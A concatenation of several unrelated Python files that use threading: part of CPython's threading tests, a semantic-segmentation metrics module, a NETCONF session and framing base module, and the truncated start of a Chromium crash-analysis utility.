def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
if __name__ == "__main__":
unittest.main()
|
metric.py | from __future__ import division
import threading
import numpy as np
__all__ = ['SegmentationMetric', 'batch_pix_accuracy', 'batch_intersection_union',
'pixelAccuracy', 'intersectionAndUnion', 'hist_info', 'compute_score']
"""Evaluation Metrics for Semantic Segmentation"""
class SegmentationMetric(object):
"""Computes pixAcc and mIoU metric scores
"""
def __init__(self, nclass):
super(SegmentationMetric, self).__init__()
self.nclass = nclass
self.lock = threading.Lock()
self.reset()
def update(self, preds, labels):
"""Updates the internal evaluation result.
Parameters
----------
labels : 'NumpyArray' or list of `NumpyArray`
The labels of the data.
preds : 'NumpyArray' or list of `NumpyArray`
Predicted values.
"""
if isinstance(preds, np.ndarray):
self.evaluate_worker(preds, labels)
elif isinstance(preds, (list, tuple)):
threads = [threading.Thread(target=self.evaluate_worker, args=(pred, label), )
for (pred, label) in zip(preds, labels)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def get(self):
"""Gets the current evaluation result.
Returns
-------
metrics : tuple of float
pixAcc and mIoU
"""
print(self.total_correct, self.total_label)
pixAcc = 1.0 * self.total_correct / (np.spacing(1) + self.total_label)
IoU = 1.0 * self.total_inter / (np.spacing(1) + self.total_union)
# It has same result with np.nanmean() when all class exist
mIoU = IoU.mean()
return pixAcc, mIoU
def evaluate_worker(self, pred, label):
correct, labeled = batch_pix_accuracy(pred, label)
inter, union = batch_intersection_union(pred, label, self.nclass)
with self.lock:
self.total_correct += correct
self.total_label += labeled
self.total_inter += inter
self.total_union += union
def reset(self):
"""Resets the internal evaluation result to initial state."""
self.total_inter = 0
self.total_union = 0
self.total_correct = 0
self.total_label = 0
def batch_pix_accuracy(predict, target):
"""PixAcc"""
# inputs are numpy array, output 4D, target 3D
assert predict.shape == target.shape
predict = predict.astype('int64') + 1
target = target.astype('int64') + 1
pixel_labeled = np.sum(target > 0)
pixel_correct = np.sum((predict == target) * (target > 0))
assert pixel_correct <= pixel_labeled, "Correct area should be smaller than Labeled"
return pixel_correct, pixel_labeled
def batch_intersection_union(predict, target, nclass):
"""mIoU"""
# inputs are numpy array, output 4D, target 3D
assert predict.shape == target.shape
mini = 1
maxi = nclass
nbins = nclass
predict = predict.astype('int64') + 1
target = target.astype('int64') + 1
predict = predict * (target > 0).astype(predict.dtype)
intersection = predict * (predict == target)
# areas of intersection and union
# element 0 in intersection occur the main difference from np.bincount. set boundary to -1 is necessary.
area_inter, _ = np.histogram(intersection, bins=nbins, range=(mini, maxi))
area_pred, _ = np.histogram(predict, bins=nbins, range=(mini, maxi))
area_lab, _ = np.histogram(target, bins=nbins, range=(mini, maxi))
area_union = area_pred + area_lab - area_inter
assert (area_inter <= area_union).all(), "Intersection area should be smaller than Union area"
return area_inter, area_union
def pixelAccuracy(imPred, imLab):
"""
This function takes the prediction and label of a single image, returns pixel-wise accuracy
To compute over many images do:
for i = range(Nimages):
(pixel_accuracy[i], pixel_correct[i], pixel_labeled[i]) = \
pixelAccuracy(imPred[i], imLab[i])
mean_pixel_accuracy = 1.0 * np.sum(pixel_correct) / (np.spacing(1) + np.sum(pixel_labeled))
"""
# Remove classes from unlabeled pixels in gt image.
# We should not penalize detections in unlabeled portions of the image.
pixel_labeled = np.sum(imLab >= 0)
pixel_correct = np.sum((imPred == imLab) * (imLab >= 0))
pixel_accuracy = 1.0 * pixel_correct / pixel_labeled
return (pixel_accuracy, pixel_correct, pixel_labeled)
def intersectionAndUnion(imPred, imLab, numClass):
"""
This function takes the prediction and label of a single image,
returns intersection and union areas for each class
To compute over many images do:
for i in range(Nimages):
(area_intersection[:,i], area_union[:,i]) = intersectionAndUnion(imPred[i], imLab[i])
IoU = 1.0 * np.sum(area_intersection, axis=1) / np.sum(np.spacing(1)+area_union, axis=1)
"""
# Remove classes from unlabeled pixels in gt image.
# We should not penalize detections in unlabeled portions of the image.
imPred = imPred * (imLab >= 0)
# Compute area intersection:
intersection = imPred * (imPred == imLab)
(area_intersection, _) = np.histogram(intersection, bins=numClass, range=(1, numClass))
# Compute area union:
(area_pred, _) = np.histogram(imPred, bins=numClass, range=(1, numClass))
(area_lab, _) = np.histogram(imLab, bins=numClass, range=(1, numClass))
area_union = area_pred + area_lab - area_intersection
return (area_intersection, area_union)
def hist_info(pred, label, num_cls):
assert pred.shape == label.shape
k = (label >= 0) & (label < num_cls)
labeled = np.sum(k)
correct = np.sum((pred[k] == label[k]))
return np.bincount(num_cls * label[k].astype(int) + pred[k], minlength=num_cls ** 2).reshape(num_cls,
num_cls), labeled, correct
def compute_score(hist, correct, labeled):
iu = np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
# print('right')
# print(iu)
mean_IU = np.nanmean(iu)
mean_IU_no_back = np.nanmean(iu[1:])
freq = hist.sum(1) / hist.sum()
freq_IU = (iu[freq > 0] * freq[freq > 0]).sum()
mean_pixel_acc = correct / labeled
return iu, mean_IU, mean_IU_no_back, mean_pixel_acc
|
base.py | # -*- coding: utf-8 eval: (yapf-mode 1) -*-
#
# February 19 2015, Christian Hopps <chopps@gmail.com>
#
# Copyright (c) 2015, Deutsche Telekom AG
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import, division, unicode_literals, print_function, nested_scopes
import logging
import io
import socket
import sys
import threading
import traceback
from lxml import etree
from netconf import NSMAP, MAXSSHBUF
from netconf.error import ChannelClosed, FramingError, SessionError
import netconf.util as ncutil
logger = logging.getLogger(__name__)
NC_BASE_10 = "urn:ietf:params:netconf:base:1.0"
NC_BASE_11 = "urn:ietf:params:netconf:base:1.1"
XML_HEADER = """<?xml version="1.0" encoding="UTF-8"?>"""
if sys.version_info[0] >= 3:
def lookahead(iterable):
"""Return an element and an indication if it's the last element"""
i = iter(iterable)
last = next(i)
for e in i:
yield last, False
last = e
yield last, True
else:
def lookahead(iterable):
"""Return an element and an indication if it's the last element"""
i = iter(iterable)
last = i.next()
for e in i:
yield last, False
last = e
yield last, True
def chunkit(msg, maxsend, minsend=0, pad="\n"):
"""
chunkit iterates over a msg returning chunks of at most maxsend
size, and of at least minsend size if non-zero. Padding will be
added if required. This function currently requires that maxsend
is at least large enough to hold 2 minsend chunks.
"""
# For now we'll make this assumption as it makes the
# implementation much easier.
assert maxsend >= 2 * minsend
sz = len(msg)
nchunks = sz // maxsend
lastmax = sz % maxsend
# Handle the special cases
if sz == 0:
return
elif nchunks == 1 and lastmax == 0:
yield msg
return
elif nchunks == 0:
# lastmax == 0 then sz == 0 handled above.
assert lastmax != 0
if lastmax < minsend:
msg = msg + pad * (minsend - lastmax)
yield msg
return
# Make sure our final chunk is at least minsend long.
nchunks -= 1
penultmax = maxsend
if lastmax == 0:
lastmax = maxsend
nchunks -= 1
elif lastmax < minsend:
penultmax -= minsend - lastmax
lastmax = minsend
left = 0
for unused in range(0, nchunks):
yield msg[left:left + maxsend]
left += maxsend
right = left + penultmax
yield msg[left:right]
yield msg[right:]
class NetconfTransportMixin(object):
def connect(self):
raise NotImplementedError()
def close(self):
raise NotImplementedError()
class NetconfPacketTransport(object):
def send_pdu(self, msg, new_framing):
raise NotImplementedError()
def receive_pdu(self, new_framing):
raise NotImplementedError()
class NetconfFramingTransport(NetconfPacketTransport):
"""Packetize an ssh stream into netconf PDUs -- doesn't need to be SSH specific"""
def __init__(self, stream, max_chunk, debug):
# XXX we have 2 channels defined one here and one in the connect/accept class
self.stream = stream
self.max_chunk = max_chunk
self.debug = debug
self.rbuffer = b""
def __del__(self):
self.close()
def close(self):
stream = self.stream
if stream is not None:
self.stream = None
if self.debug:
logger.debug("Closing netconf socket stream %s", str(stream))
stream.close()
def is_active(self):
try:
self.stream.is_active
except AttributeError:
transport = self.stream.get_transport()
if not transport:
return False
return transport.is_active()
else:
return self.stream.is_active()
def receive_pdu(self, new_framing):
assert self.stream is not None
if new_framing:
return self._receive_11()
else:
return self._receive_10()
def send_pdu(self, msg, new_framing):
assert self.stream is not None
if new_framing:
bmsg = msg.encode('utf-8')
blen = len(bmsg)
msg = "\n#{}\n".format(blen).encode('utf-8') + bmsg + "\n##\n".encode('utf-8')
else:
msg += "]]>]]>"
# Apparently ssh has a bug that requires minimum of 64 bytes?
for chunk in chunkit(msg, self.max_chunk, 64):
self.stream.sendall(chunk)
def _receive_10(self):
searchfrom = 0
while True:
eomidx = self.rbuffer.find(b"]]>]]>", searchfrom)
if eomidx != -1:
break
searchfrom = max(0, len(self.rbuffer) - 5)
buf = self.stream.recv(self.max_chunk)
self.rbuffer += buf
msg = self.rbuffer[:eomidx]
self.rbuffer = self.rbuffer[eomidx + 6:]
return msg.decode('utf-8')
def _receive_chunk(self):
blen = len(self.rbuffer)
while blen < 4:
buf = self.stream.recv(self.max_chunk)
self.rbuffer += buf
blen = len(self.rbuffer)
if self.stream is None:
if self.debug:
logger.debug("Channel closed: stream is None")
raise ChannelClosed(self)
if not buf:
if self.debug:
logger.debug("Channel closed: Zero bytes read")
raise ChannelClosed(self)
if self.rbuffer[:2] != b"\n#":
raise FramingError(self.rbuffer)
self.rbuffer = self.rbuffer[2:]
# Get chunk length or termination indicator
idx = -1
searchfrom = 0
while True:
idx = self.rbuffer.find(b"\n", searchfrom)
if 12 > idx > 0:
break
if idx > 12 or len(self.rbuffer) > 12:
raise FramingError(self.rbuffer)
searchfrom = len(self.rbuffer)
self.rbuffer += self.stream.recv(self.max_chunk)
# Check for last chunk.
if self.rbuffer[0:2] == b"#\n":
self.rbuffer = self.rbuffer[2:]
return None
lenstr = self.rbuffer[:idx]
self.rbuffer = bytes(self.rbuffer[idx + 1:])
try:
chunklen = int(lenstr)
if not (4294967295 >= chunklen > 0):
raise FramingError("Unacceptable chunk length: {}".format(chunklen))
except ValueError:
raise FramingError("Frame length not integer: {}".format(lenstr.encode('utf-8')))
while True:
blen = len(self.rbuffer)
if blen >= chunklen:
chunk = self.rbuffer[:chunklen]
self.rbuffer = self.rbuffer[chunklen:]
return chunk
self.rbuffer += self.stream.recv(self.max_chunk)
def _iter_receive_chunks(self):
assert self.stream is not None
chunk = self._receive_chunk()
while chunk:
yield chunk
chunk = self._receive_chunk()
def _receive_11(self):
assert self.stream is not None
data = b"".join([x for x in self._iter_receive_chunks()])
return data.decode('utf-8')
class NetconfSession(object):
"""Netconf Protocol Server and Client"""
# This class is almost idntical to sshutil.SSHServerSession We need to
# figure a way to factor the commonality. One issue is that this class can
# be used with any transport not just SSH so where should it go?
def __init__(self, stream, debug, session_id, max_chunk=MAXSSHBUF):
self.debug = debug
self.pkt_stream = NetconfFramingTransport(stream, max_chunk, debug)
self.new_framing = False
self.capabilities = set()
self.reader_thread = None
self.lock = threading.Lock()
self.session_id = session_id
self.session_open = False
def __del__(self):
if hasattr(self, "session_open") and self.session_open:
self.close()
def is_active(self):
with self.lock:
return self.pkt_stream and self.pkt_stream.is_active()
def __str__(self):
return "NetconfSession(sid:{})".format(self.session_id)
def send_message(self, msg):
with self.lock:
pkt_stream = self.pkt_stream
if not pkt_stream:
logger.debug("Dropping message b/c no stream (%d): %s", len(msg), msg)
if self.debug:
logger.debug("Sending message (%d): %s", len(msg), msg)
pkt_stream.send_pdu(XML_HEADER + msg, self.new_framing)
def _receive_message(self):
# private method to receive a full message.
with self.lock:
if self.reader_thread and not self.reader_thread.keep_running:
return None
pkt_stream = self.pkt_stream
return pkt_stream.receive_pdu(self.new_framing)
def send_hello(self, caplist, session_id=None):
msg = ncutil.elm("hello", attrib={'xmlns': NSMAP['nc']})
caps = ncutil.elm("capabilities")
for cap in caplist:
ncutil.subelm(caps, "capability").text = str(cap)
if session_id is not None:
assert hasattr(self, "methods")
self.methods.nc_append_capabilities(caps) # pylint: disable=E1101
msg.append(caps)
if self.debug:
logger.debug("%s: Sending HELLO", str(self))
if session_id is not None:
msg.append(ncutil.leaf_elm("session-id", str(session_id)))
msg = etree.tostring(msg)
self.send_message(msg.decode('utf-8'))
def close(self):
if self.debug:
logger.debug("%s: Closing.", str(self))
with self.lock:
if self.session_open:
self.session_open = False
self.session_id = None
if self.reader_thread:
self.reader_thread.keep_running = False
if self.pkt_stream is not None:
if self.debug:
logger.debug("%s: Closing transport.", str(self))
pkt_stream = self.pkt_stream
self.pkt_stream = None
if pkt_stream:
# If we are blocked on reading this should unblock us
pkt_stream.close()
def _open_session(self, is_server):
assert is_server or self.session_id is None
# The transport should be connected at this point.
try:
# Send hello message.
self.send_hello((NC_BASE_10, NC_BASE_11), self.session_id)
# Get reply
reply = self._receive_message()
if self.debug:
logger.debug("Received HELLO")
# Parse reply
tree = etree.parse(io.BytesIO(reply.encode('utf-8')))
root = tree.getroot()
caps = root.xpath("//nc:hello/nc:capabilities/nc:capability", namespaces=NSMAP)
# Store capabilities
for cap in caps:
self.capabilities.add(cap.text)
if NC_BASE_11 in self.capabilities:
self.new_framing = True
elif NC_BASE_10 not in self.capabilities:
raise SessionError("Server doesn't implement 1.0 or 1.1 of netconf")
# Get session ID.
try:
session_id = root.xpath("//nc:hello/nc:session-id", namespaces=NSMAP)[0].text
# If we are a server it is a failure to receive a session id.
if is_server:
raise SessionError("Client sent a session-id")
self.session_id = int(session_id)
except (KeyError, IndexError, AttributeError):
if not is_server:
raise SessionError("Server didn't supply session-id")
except ValueError:
raise SessionError("Server supplied non integer session-id: {}".format(session_id))
self.session_open = True
# Create reader thread.
self.reader_thread = threading.Thread(target=self._read_message_thread)
self.reader_thread.daemon = True
self.reader_thread.keep_running = True
self.reader_thread.start()
if self.debug:
logger.debug("%s: Opened version %s session.", str(self), "1.1"
if self.new_framing else "1.0")
except Exception:
self.close()
raise
def reader_exits(self):
# Called from reader thread when our reader thread exits
raise NotImplementedError("reader_exits")
def reader_handle_message(self, msg):
# Called from reader thread after receiving a framed message
raise NotImplementedError("read_handle_message")
def _read_message_thread(self):
# XXX the locking and dealing with the exit of this thread needs improvement
if self.debug:
logger.debug("Starting reader thread.")
reader_thread = self.reader_thread
try:
while self.pkt_stream:
with self.lock:
pkt_stream = self.pkt_stream
if not reader_thread.keep_running:
break
assert pkt_stream is not None
msg = self._receive_message()
if msg:
self.reader_handle_message(msg)
closed = False
else:
# Client closed, never really see this 1/2 open case unfortunately.
if self.debug:
logger.debug("Client remote closed, exiting reader thread.")
closed = True
with self.lock:
if closed:
reader_thread.keep_running = False
if not reader_thread.keep_running:
break
if self.debug:
logger.debug("Exiting reader thread")
except AttributeError as error:
# Should we close the session cleanly or just disconnect?
if "'NoneType' object has no attribute 'recv'" in str(error):
logger.error("%s: Session channel cleared (open: %s): %s: %s", str(self),
str(self.session_open), str(error), traceback.format_exc())
else:
logger.error(
"Unexpected exception in reader thread [disconnecting+exiting]: %s: %s",
str(error), traceback.format_exc())
self.close()
except ChannelClosed as error:
# Should we close the session cleanly or just disconnect?
# if self.debug:
# logger.debug("%s: Session channel closed [session_open == %s]: %s: %s",
# str(self),
# str(self.session_open),
# str(error),
# traceback.format_exc())
# else:
logger.debug("%s: Session channel closed [session_open == %s]: %s", str(self),
str(self.session_open), str(error))
try:
self.close()
except Exception as error:
logger.debug("%s: Exception while closing during ChannelClosed: %s", str(self),
str(error))
except SessionError as error:
# Should we close the session cleanly or just disconnect?
logger.error("%s Session error [closing session]: %s", str(self), str(error))
self.close()
except socket.error as error:
if self.debug:
logger.debug("Socket error in reader thread [exiting]: %s", str(error))
self.close()
except Exception as error:
with self.lock:
keep_running = reader_thread.keep_running
if keep_running:
logger.error(
"Unexpected exception in reader thread [disconnecting+exiting]: %s: %s",
str(error), traceback.format_exc())
self.close()
else:
# XXX might want to catch errors due to disconnect and not re-raise
logger.debug("Exception in reader thread [exiting]: %s: %s", str(error),
traceback.format_exc())
finally:
# If we are exiting the read thread we close the session.
self.reader_exits()
__author__ = 'Christian Hopps'
__date__ = 'December 23 2014'
__version__ = '1.0'
__docformat__ = "restructuredtext en"
|
crash_utils.py | # Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import atexit
import cgi
import ConfigParser
import json
import os
import Queue
import threading
import time
from common import utils
from result import Result
INFINITY = float('inf')
MAX_THREAD_NUMBER = 10
TASK_QUEUE = None
def SignalWorkerThreads():
global TASK_QUEUE
if not TASK_QUEUE:
return
for i in range(MAX_THREAD_NUMBER):
TASK_QUEUE.put(None)
# Give worker threads a chance to exit.
# Workaround the harmless bug in python 2.7 below.
time.sleep(1)
atexit.register(SignalWorkerThreads)
def Worker():
global TASK_QUEUE
while True:
try:
task = TASK_QUEUE.get()
if not task:
return
except TypeError:
# According to http://bugs.python.org/issue14623, this is a harmless bug
# in python 2.7 which won't be fixed.
# The exception is raised on daemon threads when python interpreter is
# shutting down.
return
function, args, kwargs, result_semaphore = task
try:
function(*args, **kwargs)
except:
pass
finally:
# Signal one task is done in case of exception.
result_semaphore.release()
def RunTasks(tasks):
"""Run given tasks. Not thread-safe: no concurrent calls of this function.
Return after all tasks were completed. A task is a dict as below:
{
'function': the function to call,
'args': the positional argument to pass to the function,
'kwargs': the key-value arguments to pass to the function,
}
"""
if not tasks:
return
global TASK_QUEUE
if not TASK_QUEUE:
TASK_QUEUE = Queue.Queue()
for index in range(MAX_THREAD_NUMBER):
thread = threading.Thread(target=Worker, name='worker_%s' % index)
# Set as daemon, so no join is needed.
thread.daemon = True
thread.start()
result_semaphore = threading.Semaphore(0)
# Push task to task queue for execution.
for task in tasks:
TASK_QUEUE.put(
(task['function'], task.get('args', []),
task.get('kwargs', {}), result_semaphore))
# Wait until all tasks to be executed.
for _ in tasks:
result_semaphore.acquire()
def GetRepositoryType(revision_number):
"""Returns the repository type of this revision number.
Args:
revision_number: A revision number or git hash.
Returns:
'git' or 'svn', depending on the revision_number.
"""
if utils.IsGitHash(revision_number):
return 'git'
else:
return 'svn'
def ParseURLsFromConfig(file_name):
"""Parses URLS from the config file.
The file should be in python config format, where svn section is in the
format "svn:component_path".
Each of the section for svn should contain changelog_url, revision_url,
diff_url and blame_url.
Args:
file_name: The name of the file that contains URL information.
Returns:
A dictionary that maps repository type to list of URLs. For svn, it maps
key 'svn' to another dictionary, which maps component path to the URLs
as explained above. For git, it maps to the URLs as explained above.
"""
config = ConfigParser.ConfigParser()
# Get the absolute path of the config file, and read the file. If it fails,
# return none.
config_file_path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
file_name)
config.read(config_file_path)
if not config:
return None
# Iterate through the config file, check for sections.
config_dict = {}
for section in config.sections():
# These two do not need another layer of dictionary, so add it and go
# to next section.
if ':' not in section:
for option in config.options(section):
if section not in config_dict:
config_dict[section] = {}
url = config.get(section, option)
config_dict[section][option] = url
continue
# Get repository type and component name from the section name.
repository_type_and_component = section.split(':')
repository_type = repository_type_and_component[0]
component_path = repository_type_and_component[1]
# Add 'svn' as the key, if it is not already there.
if repository_type not in config_dict:
config_dict[repository_type] = {}
url_map_for_repository = config_dict[repository_type]
# Add the path to the 'svn', if it is not already there.
if component_path not in url_map_for_repository:
url_map_for_repository[component_path] = {}
type_to_url = url_map_for_repository[component_path]
# Add all URLs to this map.
for option in config.options(section):
url = config.get(section, option)
type_to_url[option] = url
return config_dict
def NormalizePath(path, parsed_deps):
"""Normalizes the path.
Args:
path: A string representing a path.
parsed_deps: A map from component path to its component name, repository,
etc.
Returns:
A tuple containing a component this path is in (e.g blink, skia, etc)
and a path in that component's repository. Returns None if the component
repository is not supported, i.e from googlecode.
"""
# First normalize the path by retreiving the normalized path.
normalized_path = os.path.normpath(path).replace('\\', '/')
# Iterate through all component paths in the parsed DEPS, in the decreasing
# order of the length of the file path.
for component_path in sorted(parsed_deps,
key=(lambda path: -len(path))):
# new_component_path is the component path with 'src/' removed.
new_component_path = component_path
if new_component_path.startswith('src/') and new_component_path != 'src/':
new_component_path = new_component_path[len('src/'):]
# We need to consider when the lowercased component path is in the path,
# because syzyasan build returns lowercased file path.
lower_component_path = new_component_path.lower()
# If this path is the part of file path, this file must be from this
# component.
if new_component_path in normalized_path or \
lower_component_path in normalized_path:
# Case when the retreived path is in lowercase.
if lower_component_path in normalized_path:
current_component_path = lower_component_path
else:
current_component_path = new_component_path
# Normalize the path by stripping everything off the component's relative
# path.
normalized_path = normalized_path.split(current_component_path, 1)[1]
lower_normalized_path = normalized_path.lower()
# Add 'src/' or 'Source/' at the front of the normalized path, depending
# on what prefix the component path uses. For example, blink uses
